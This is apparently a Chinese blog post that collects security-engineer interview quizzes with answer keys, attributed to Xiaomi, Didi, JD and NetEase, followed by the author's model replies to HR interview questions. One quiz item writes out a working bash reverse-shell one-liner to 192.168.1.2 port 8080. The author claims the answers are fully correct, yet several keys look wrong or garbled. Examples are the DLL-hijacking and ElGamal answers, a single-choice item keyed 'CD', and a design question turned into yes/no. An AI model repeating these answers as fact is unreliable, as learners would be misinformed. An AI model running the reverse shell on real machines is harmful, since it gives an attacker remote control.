说明：本篇整理的大厂面试题为CSDNAPP中所有安全工程师岗位的题目汇总，还附有本人的几次模拟面试中常见人事问题的见解与思考，可为面试网络安全相关岗位的人提供参考，如有不当之处还请前辈们批评指正，谢谢

每一道题都有正确答案，你可以假装看不到先做一遍试试，回头再看一遍

目录导航

说明：本篇整理的大厂面试题为CSDNAPP中所有安全工程师岗位的题目汇总，还附有本人的几次模拟面试中常见人事问题的见解与思考，可为面试网络安全相关岗位的人提供参考，如有不当之处还请前辈们批评指正，谢谢小米滴滴 京东网易个人模拟面试中常见人事问题的见解与思考1.你认为怎样适应从学校到社会的转变？2.你接触网络安全行业有多长时间了？为什么选择做这个行业？3.你为何选择来我公司工作？你对我公司了解些什么？4.你为什么要应聘这个职位？5.你在选择工作时都考虑哪些因素？6.领导交给你一个很重要但又很艰难的工作，你怎么去处理？7.谈谈你对公司加班的看法？8.你认为你能对我公司做出什么贡献？9.你的业余时间一般是怎么度过的？10.谈谈**你的优点和缺点是什么？11.假如这次招聘你未被录取，你今后会做哪些努力？12.我们认为你的条件与其他人相比并没有很大的优势，你怎么说明你能做好这项工作？13.你的职业发展计划是什么？如何去实现这个计划？14.你对薪资的要求？公司达不到你的要求怎么办？15.还有什么要问的吗？（切记不要问薪资问题）

小米

单选题 正确答案为A

CORS的作用是？（）A. 允许客户端获取服务器的返回数据B. 组织客户端发送请求C. 防止跨域漏洞D. 防止CSRF漏洞

多选题 正确答案为A,B,C,D

服务器入侵溯源可以依赖于？（）A. 网站源码分析B. 日志分析C. 系统存储的信息分析D. 分析进程端口

多选题 正确答案为A,B,C

BLE 容易遭受哪些攻击？（）A. 重放攻击B. 拒绝服务攻击C. 主动和被动监听D. 心脏滴血攻击

多选题 正确答案为B,C

关于这条命令，说法正确的是 bash -i >& /dev/tcp/192.168.1.2/8080 0>&1A. 这不是一个反弹shellB. 通过在192.168.1.2上监听8080，可以远程操作运行了此命令的机器C. 这是一个反弹shellD. 此命令存在语法错误

单选题 正确答案为A

对于摄像头产品，下面说法错误的是()A. 为了方便对摄像头进行调试和维护，设备需默认开启远程管理服务，比如 telnetB. 为了保证用户隐私安全，视频数据传输需要加密C. 基于安全最小化原则，设备对外尽可能少的开放不必要的服务D. 对于设备来说，使用基于 https 的 DNS 服务会更安全

单选题 正确答案为B

通过设置LD_PRELOAD环境变量，能达到什么目的（）A. 提前载入动态库，提高程序启动效B. 替换掉程序依赖的动态库，达到注入程序的目的C. 其功能等同于运行ldconfig命令D. 可以更新系统依赖库到最新版本

单选题 正确答案为A

关于网络端口号，以下哪个说法是正确的（）A. 通过netstat命令，可以查看进程监听端口的情况B. https协议默认端口号是8081C. iptables命令用于设置ip访问规则，不能设置端口访问规则D. 一般认为，0-1024之间的端口号为周知端口号(Well Known Ports)

多选题 正确答案为A,B,C

关于sudo命令，以下说法正确的是（）A. 允许授权用户以超级用户或其他用户身份执行命令B. 能限制指定用户在指定主机上运行某些命令C. 默认情况下，只有root用户可以使用sudo命令D. su命令是sudo命令的链接，指向sudo命令

单选题 正确答案为B

在给FTP服务器设计ACL时，如果FTP服务器采用了的主动模式，则对客户端只需要开放21端口即可A. 是B. 不是

单选题 正确答案为A

需要针对一个通过手机注册的帐号系统设计安全方案，从注册、登录、传输、存储等方面阐述你的方案A. 是B. 不是

单选题 正确答案为A

SSRF 不但可以用于信息内网探测，还能达到远程命令执行的效果A. 是B. 不是

单选题 正确答案为B

nmap 是端口扫描工具，并不能扫描漏洞（）A. 是B. 不是

单选题 正确答案为B

安全的使用复制类函数只需要做到目标缓冲的大小大于源缓冲的大小A. 是B. 不是

单选题 正确答案为B

Redis以root权限监听在内网地址上是安全的，不用设置密码。A. 是B. 不是

单选题 正确答案为B

在php中可以使用当前时间作为随机数种子产生随机数是安全的A. 是B. 不是

单选题 正确答案为B

CC攻击的原理是利用了TCP/IP的协议缺陷，造成被攻击服务器资源耗尽的拒绝服务攻击方式。A. 是B. 不是

滴滴

多选题

黑客通过以下哪种攻击方式，可能大批量获取网站注册用户的身份信息A. XSSB. CSRFC. 越权D. 以上都不可以

ABC

单选题

以下关于内存文件mmap映射的说法不正确的是A. 当文件被映射到进程地址空间后，进程可以像访问普通内存一样对文件进行访问B. 子进程会继承父进程通过mmap映射的地址空间C. 使用mmap必须指定映射到内存的具体文件D. 同一个文件的不同段内容可以分别被映射到不同的内存空间

C

多选题

浏览器和服务器在基于https进行请求链接到数据传输过程中，用到了如下哪些技术：A. 非对称加密技术B. 对称加密技术C. 散列（哈希）算法D. 数字证书

ABCD

多选题

Android 应用中导致HTTPS中间人攻击的原因有？A. 没有对SSL证书校验B. 没有对主机名进行校验C. SSL证书被泄露D. 使用WIFI连接网络

ABC

单选题

iOS平台上常见的Hook框架有:A. XposedB. Intent FuzzC. DrozerD. Substrate

D

多选题

Linux系统下，关于权限描述正确的是：A. 文件权限描述"-rwxrw-r-x"对应权限值为754B. 文件权限描述"drw-rw-rw-"中的首字符’d’表示该文件为软链接文件C. 文件权限值为723，表示其他用户可以执行该文件D. 文件权限值744，表示除了文件所有者外其他用户不可执行

CD

单选题

当一个HTTPS 站点的证书存在问题时，浏览器就会出现警告信息以提醒浏览者注意，下列描述中哪一条不是导致出现提示的必然原因？A. 证书过期B. 证书没有被浏览器信任C. 证书的CN与实际站点不符D. 浏览器找不到对应的证书颁发机构

CD

多选题

以下说法中，哪些说法是正确的A. 缓冲区溢出指的是通过向程序的缓冲区写入超出其长度的内容，造成缓冲区的溢出，从而破坏程序的堆栈，使程序转而执行其他的指令，以达到攻击的目的。B. 在C/C++语言中，缓冲区溢出的任何尝试通常都会被语言本身自动检测并阻止。C. 检查缓冲区长度、GS编译选项、堆栈保护可以防御溢出攻击D. 溢出是程序设计者设计时的不足所带来的错误。

ABC

单选题

​ 9.常见的网络嗅探器，以下哪个不是？

A. tcpdumpB. wvsC. wiresharkD. sniffit

B

多选题

​ 10.下列哪些函数可能导致缓冲区溢出?

A. wcscpyB. vsprintfC. scanfD. strcat_s

ABC

京东

单选题

执行ls -la /usr/bin/passwd后，返回如下内容，下列描述错误的是：-rwsr-xr-x 1 root root 59640 Sep 27 /usr/bin/passwdA. 程序可以被任何账户执行B. 文件属性中的s表示这个文件是系统文件C. 这不是一个目录D. 文件/目录属于root用户

B

单选题

有关DLL劫持，下列说法正确的是：A. 动态链接库文件通常加载顺序问题导致B. 使用LoadLibrary API加载DLL时使用绝对路径可以避免DLL劫持问题C. 程序会最先加载windows目录中的dll文件D. 可以通过Process Monitor发现进程正在尝试加载的dll文件

C

多选题 收藏

恶意攻击行为中，属于被动攻击的有？A. 窃听B. 流量分析C. SQL注入攻击D. 暴力破解

AB

单选题 收藏

向服务器发送POST请求，告诉它将要POST的数据为n，服务器会开辟长度为n的内存空间等待接收数据。当n足够大，POST请求足够多的时候，这种攻击会吃到服务器大量内存，从而影响服务器性能。这属于_______拒绝服务攻击A. 带宽流量攻击B. syn洪泛攻击C. 应用层攻击D. 永久性拒绝服务攻击

C

单选题 收藏

关于非对称加密，以下说法错误的是？A. 加解密效率高B. 可以有效防止中间人攻击C. 可以用于进行大数据的加密传输D. 广泛应用与ssh/https等协议中

A

单选题 收藏

ssh可以密钥进行免密码登录。提供ssh服务的一端为服务端，发起ssh请求的一端为客户端。关于该方式登录以下说法正确的是A. 密钥登录是采用了对称加密B. 密钥登录是采用了非对称加密C. 客户端存储公钥，服务端存储私钥D. 服务端存储公钥，客户端存储私钥

B

单选题 收藏

下面有关Android沙盒说法正确的是A. 每一个应用程序运行在一个安全的沙盒环境，同一个系统上的其他应用程序不能访问这个程序的代码或者私有数据B. 每一个应用程序叫做沙盒C. 把一个应用程序放到外部存储区域叫做沙盒D. 把应用程序载入到模拟器中叫做沙盒

A

单选题 收藏

https协议是位于网络的哪一层？A. 网络层B. 应用层C. 传输层D. 数据链路层

B

多选题 收藏

cookie安全机制，cookie有哪些设置可以提高安全性？A. 指定cookie domain的子域名B. httponly设置C. cookie secure设置，保证cookie在https层面传输D. 都不对

ABC

网易

单选题 正确答案为B

下列关于Android安全机制说法错误的是A. 应用程序签名机制，规定APK文件必须被开发者进行数字签名，以便标识应用程序作者和在应用程序之间的信任关系B. 进程沙箱隔离机制，使得Android应用程序在安装时被赋予独特的用户标识（UID），程序运行在独立的进程空间，但是可以访问其他应用程序的资源文件。C. 权限声明机制，要想获得在对象上进行操作，就需要把权限和此对象的操作进行绑定。D. 进程通信机制，基于共享内存的Binder实现，提供轻量级的远程进程调用（RPC），确保进程间通信的数据不会溢出越界

单选题 正确答案为A

以下哪项是对抗ARP欺骗有效的手段A. 使用静态的ARP缓存B. 在网络上阻止ARP报文的发送C. 安装杀毒软件并更新到最新的病毒库D. 使用linux系统提高安全性

单选题 正确答案为A

向有限的空间输入超长的字符串是哪一种攻击手段?A. 缓冲区溢出B. 网络监听C. 拒绝服务D. IP欺骗

单选题

下面关于traceroute命令，描述正确的是BA. 检查应用层是否正常B. 显示到达目的地址经过的路由器C. 显示本地网络连接情况D. 检查数据链路层是否正常

单选题 正确答案为A

Stack Canary 的作用是什么？A. 缓解栈越界写入B. 缓解栈越界读取C. 缓解堆越界写入D. 缓解堆越界读取

单选题 正确答案为A

数字签名 elgamal算法的原理是?A. 扩展欧几里得定理B. 中国剩余定理C. 欧拉定理D. 拉斐尔定律

单选题 正确答案为D

如果一名攻击者截获了一个公钥，然后他将这个公钥替换为自己的公钥并发送给接收者，这种情况属于哪一种攻击A. 重放攻击B. Smurf攻击C. 字典攻击D. 中间人攻击

单选题 正确答案为C

下列关于安卓打包混淆说法错误的是A. 通常说的proguard包括四个功能：shrinker（压缩）, optimizer（优化）,obfuscator（混淆）,preverifier（预校验）B. 如果希望指定类和类的成员变量不被移除混淆，可以使用-keep [,modifier, …] class_specification配置C. 如果不想输入文件被压缩，可以使用-dontobfuscate 配置命令D. 如果想输出新旧元素名的对照表的文件，方便问题排查，可以使用-printmapping [filename]配置

单选题 正确答案为D

哪个选项不是利用Activity劫持对系统进行恶意攻击的?A. 遍历运行中的程序B. 恶意程序启动带标志的钓鱼试Activity覆盖正常的ActivityC. 用户在伪造的界面上进行操作D. 查杀恶意程序发送的信息

单选题 正确答案为A

Dalvik 字节码有几种数据类型A. 2种B. 3种C. 4种D. 8种

单选题 正确答案为A

Android 常用的动态分析工具是A. IDAProB. APKtoolC. AndroidKillerD. ApkIDE

单选题 正确答案为C

下列不属于iOS逆向分析方法的是A. 静态分析B. 网络分析C. 数据分析D. 动态分析

单选题 正确答案为B

不是Anti Emulator检测的是?A. 属性检测B. 物理机文件检测C. 基于cache行为检测D. 基于代码指令执行检测

单选题

Android程序的反破解技术中，属于防止重编译的是BA. 代码混淆B. 校验保护C. NDK保护D. 外壳保护

单选题 正确答案为C

DexClassData类分别定义信息里不包括的是?A. Method信息B. Code信息C. Attribute信息D. ClassDataHeadr信息

单选题 正确答案为A

客户端未对配置信息、本地数据库、其他数据文件加密保存属于。A. 敏感通信数据传输的机密性问题B. 重放类安全问题C. 客户端程序自身防护类安全问题D. 业务流程的有效性

以上题目都是本人用使两个月时间作答与整理的，正确率已达100%，能记住这些题目拿offer问题不大

个人模拟面试中常见人事问题的见解与思考

1.你认为怎样适应从学校到社会的转变？

1 少说话多做事

2 遇到事情要学会自己解决

3 从不同的角度看待一件事情或一个人，不要太片面

4 多注意别人说话,多理解理解不要误会别人的意思!学会换位思考

2.你接触网络安全行业有多长时间了？为什么选择做这个行业？

我接触这个行业快一年了，在部队中就很关注，因为经常看到国家机密泄露的案件，那时候的想法很简单，就是希望能够进入这个行业做出点成效，为国家贡献微薄之力

3.你为何选择来我公司工作？你对我公司了解些什么？

因为贵公司符合我的理想规划，首先贵公司是网络安全行业的领军单位，有很大的发展潜力，对我而言也是技术增进的最好平台。同时我觉得贵公司的渗透测试工程师岗位也很适合我，能够快速的提升自己，让我追寻梦想的脚步。

4.你为什么要应聘这个职位？

我觉得自己各方面都很符合这个职位的要求，同时也热爱这个职业岗位。

5.你在选择工作时都考虑哪些因素？

我只考虑这个岗位对我技术水平的提升有没有帮助，薪资待遇只要能够维持正常生活就可以

6.领导交给你一个很重要但又很艰难的工作，你怎么去处理？

立马着手准备，遇到困难请教别人或找人帮忙，把工作当成自己的事情用心去做

7.谈谈你对公司加班的看法？

公司加班是企业常态，我国发展这么快就是因为有无数人在背后默默地付出，加班还可以提升自己的技术水平，也累不到哪去，年轻人就应该多奋斗，不能选择安逸

8.你认为你能对我公司做出什么贡献？

我有一定的技术水平，可以给同岗位的人分担一些压力，也希望可以给公司带来更多收益和声望

9.你的业余时间一般是怎么度过的？

我会看一些业内的咨询和时政周刊

10.谈谈**你的优点和缺点是什么？

我的优点是技术能力还可以，有一定的领导能力，缺点是有些强迫症，太过于追求完美

11.假如这次招聘你未被录取，你今后会做哪些努力？

我会分析自己存在哪些问题，继续深造，提升自己的能力，改正自己的不足

12.我们认为你的条件与其他人相比并没有很大的优势，你怎么说明你能做好这项工作？

我做事非常认真负责，可能我不是做的最好的，但我一定是最用心的

13.你的职业发展计划是什么？如何去实现这个计划？

在现阶段我主要以提升自己的技术水平为准，走技术发展路线，中期的话以达到成为某一方面专家为目标研究安全架构和安全产品的开发，在行业内能有一定的影响力，后期的话就是希望能为国家做出一些力所能及的贡献，即使没有薪资回报，因为我是比较爱国的，就特别希望国家的安全网络牢不可破，能够成为世界上网络结构最安全的国家

14.你对薪资的要求？公司达不到你的要求怎么办？

只要能满足日常生活需要，实在不行我可以放低一点要求

15.还有什么要问的吗？（切记不要问薪资问题）

请问贵公司有让员工经常出差的需求么